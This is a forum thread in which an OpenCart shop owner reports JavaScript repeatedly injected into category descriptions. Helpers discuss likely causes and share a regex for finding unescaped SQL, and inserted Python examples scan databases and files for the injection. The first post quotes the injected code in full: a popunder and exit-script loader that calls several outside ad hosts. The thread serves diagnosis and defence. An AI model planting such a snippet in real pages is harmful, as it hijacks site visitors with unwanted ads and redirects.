OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Tue Jun 20, 2017 10:55 pm
by ScuzUK
I'm brand spanking new to OpenCart but I keep getting pop-ups after fresh installs. On each install I've changed the admin name/password and changed the admin URL, but it keeps happening.
What's the cause and how can I stop it?
Code:
<script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync="false" type="text/javascript" src="//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2"></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 12:08 am
by IP_CAM
Well, what are you trying to tell us?
The code you've added has nothing to do with OC.
Ernie
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 12:29 am
by ScuzUK
Every time I look at the category description in code in OpenCart, it's been changed to the following:
What is causing this and how do I stop it?
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 12:59 am
by k2tec
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 2:42 am
by ScuzUK
Did I miss a "fix" in that thread? Not being rude, totally grateful for the help, but I don't see a "change this" or "upload this".
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 3:04 am
by IP_CAM
Well, what fix do you expect? There is no simple fix for such things; it depends on many different things, starting from the server setup and ending with the individual software and installation. That's why it takes professionals to secure servers and software, and it's an ongoing task to keep it secure. So, better click the link in k2tec's posting, and you'll find at least some valuable information on what you can do about it.
Ernie
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 3:16 am
by k2tec
Like IP_CAM says, there is no simple solution for this problem. It can be your own PC or a bad module. Or your neighbor on a shared server.
You have to compare your site with the original files of OC and search for src='//p79479.clksite.com in your database and delete the JavaScript.
If it is a fresh install, download it from the OC site and do not use the installer of your hoster.
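An added example, not part of k2tec's post: one way to do the database search described above in Python, going slightly further by reporting every third-party host a stored text loads scripts from, whether the markup is raw or HTML-entity-encoded. It assumes text columns have been exported as (table, row id, text) rows; the table names use OpenCart's default oc_ prefix, the row ids are hypothetical, and the sample rows are constructed from the hosts in the snippet in the first post.

```python
import html
import re
from urllib.parse import urlsplit

# <script ... src=...> tags, and run-time loaders of the form  x.src = '//host/...'
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
DYNAMIC_SRC = re.compile(r"\.src\s*=\s*[\"']([^\"']+)[\"']", re.I)


def external_hosts(text, own_hosts=()):
    """Return the sorted third-party hosts that `text` loads scripts from."""
    # Text saved through the OpenCart admin is stored entity-encoded
    # (&lt;script ...); a direct database write may be raw. Decode until stable.
    prev = None
    while prev != text:
        prev, text = text, html.unescape(text)
    hosts = set()
    for pattern in (SCRIPT_SRC, DYNAMIC_SRC):
        for url in pattern.findall(text):
            try:
                host = urlsplit(url).hostname  # None for relative (same-site) paths
            except ValueError:
                continue  # malformed URL, nothing to report
            if host and host not in own_hosts:
                hosts.add(host)
    return sorted(hosts)


def scan_rows(rows, own_hosts=()):
    """rows: iterable of (table, row_id, text). Returns rows that load foreign scripts."""
    findings = []
    for table, row_id, text in rows:
        hosts = external_hosts(text or "", own_hosts)
        if hosts:
            findings.append((table, row_id, hosts))
    return findings


# Constructed sample rows (hypothetical ids; hosts taken from the snippet in the first post).
RAW_TAG = '<script type="text/javascript" src="//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2"></script>'
SAMPLE_ROWS = [
    ("oc_category_description", 20, "&lt;p&gt;Desktops&lt;/p&gt;"),
    ("oc_category_description", 25, html.escape(RAW_TAG)),  # entity-encoded, as stored
    ("oc_category_description", 33, "<script>var s = document.createElement('script'); s.src = '//cdn.shorte.st/link-converter.min.js';</script>"),
    ("oc_information_description", 4, '<script src="catalog/view/javascript/common.js"></script>'),
]

if __name__ == "__main__":
    for table, row_id, hosts in scan_rows(SAMPLE_ROWS):
        print(f"{table} row {row_id}: loads script from {', '.join(hosts)}")
```

Pass the shop's own domain in own_hosts so that absolute URLs pointing back at the store are not reported.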
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 9:23 pm
by ADD Creative
What theme and extensions are you using? Have you looked in your server logs to see if there is anything unusual?
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Thu Jun 22, 2017 7:12 pm
by sims
There is a pattern emerging here
What we know as facts:
1. Affects OpenCart from versions 1.5.5.1 to 2.3.0.2
2. A wide variety of different themes
3. The code is injected into the database
4. No file(s) are uploaded or altered on the web server
5. No admin login used
6. Many different Hosting companies
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Thu Jun 22, 2017 8:22 pm
by IP_CAM
Well, I am not sure, and so far I have never heard of someone using a v.1.5.6.x version yet, so I assume that it could likely also be an OcMod doing such things. This is because OcMod content is placed in the DB, in contrast to VqMod content, and if a smart fellow were able to modify an OcMod, it would be the easiest way to mess up the software. And even an unsuccessful attempt to install an OcMod usually leaves its content in a shop extension directory until removed again, as I found out, so a real pro may find different ways to add bad code without a user being aware of it.
Just a wild guess...
Ernie
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Tue Jun 27, 2017 4:45 am
by ADD Creative
sims wrote: ↑Thu Jun 22, 2017 7:12 pm
There is a pattern emerging here
What we know as facts:
1. Affects OpenCart from versions 1.5.5.1 to 2.3.0.2
2. A wide variety of different themes
3. The code is injected into the database
4. No file(s) are uploaded or altered on the web server
5. No admin login used
6. Many different Hosting companies
That does seem to be the case. Given that there have been a few reports of the code injected into the database, but not the 1000s you would expect if every OpenCart store was vulnerable (I've not seen it on any of our clients' sites so far). There has been at least one known theme with a vulnerability, so there could be more out there (viewtopic.php?f=179&t=183812). I believe the issue is less likely to do with the OpenCart core and more likely to be down to extensions or configuration for the following reasons.
While working on sites for clients, we've found a few extensions that have had SQL vulnerabilities (we reported these to the authors). At least one of these was used to successfully attack a site. There must be 100s of badly written extensions out there.
I've looked through a lot of the code for version 1.5.5.1, for a project I work on backporting bug fixes and security fixes to older versions of OpenCart. I've not seen any places where SQL could be injected (that's not to say there aren't any). I've used the following regex search in a text editor (Notepad++, but others will also do it). It's not perfect and will miss a lot, and for 1.5.5.1 it finds 12 hits in 7 files of possible places, but nothing looks to me like it could be used in an injection.
Code:
'%?"[\s]*\.[\s]*\$(?!(this->db->escape|db->escape))[\w]+
Can you run the regex search on your 1.5.5.1 install to see if you get anything different (search .php, .tpl and .xml files)?
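An added example, not part of ADD Creative's post: the same regex run from Python over a directory tree, restricted to .php, .tpl and .xml files, for anyone who prefers a script to an editor search. The function names are hypothetical and SAMPLE_PHP is constructed (it is not OpenCart code); it shows a value passed through $this->db->escape being skipped, two quoted concatenations being flagged, and an unquoted one being missed.

```python
import os
import re

# The search pattern from the post above, unchanged.
UNESCAPED_CONCAT = re.compile(
    r"""'%?"[\s]*\.[\s]*\$(?!(this->db->escape|db->escape))[\w]+""")
EXTENSIONS = (".php", ".tpl", ".xml")


def scan_text(text):
    """Return (line_number, matched_text) for every hit in `text`."""
    # Search the whole text, not line by line: [\s]* may span a line break,
    # as it does in an editor's regex search.
    return [(text.count("\n", 0, m.start()) + 1, m.group(0))
            for m in UNESCAPED_CONCAT.finditer(text)]


def scan_tree(root):
    """Walk `root` and return (relative_path, line_number, matched_text) hits."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                rel = os.path.relpath(path, root)
                hits += [(rel, line, text) for line, text in scan_text(fh.read())]
    return hits


# Constructed sample (not OpenCart code): one escaped value, two hits, one miss.
SAMPLE_PHP = """<?php
$db->query("UPDATE demo SET name = '" . $this->db->escape($name) . "' WHERE id = '" . (int)$id . "'");
$db->query("SELECT * FROM demo WHERE name LIKE '%" . $filter . "%'");
$db->query("SELECT * FROM demo WHERE code = '" . $this->request->get['code'] . "'");
$db->query("SELECT * FROM demo WHERE id = " . $id);  // unquoted: not matched
"""

if __name__ == "__main__":
    for line, text in scan_text(SAMPLE_PHP):
        print(f"line {line}: {text}")
```

A hit is only a place to read by hand: the pattern flags any variable concatenated straight after a quote, whether or not it was sanitised earlier in the code.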
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Tue Jun 27, 2017 7:39 pm
by sims
@ADD creative
thanks for taking the time to reply
I stand by my statements - they are all correct (I did not say it was due to core Opencart files)
I literally searched for that regex string (is that what you meant me to do?) and could not find it.
EDIT: forget that! I forgot to tick the regex box.
What do you want me to do with the search results?
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Thu Jun 29, 2017 12:33 am
by ADD Creative
How many results did it get? You could post the results here (remove anything others shouldn't see first). Or message them to me and I'll compare to a default install of 1.5.5.1.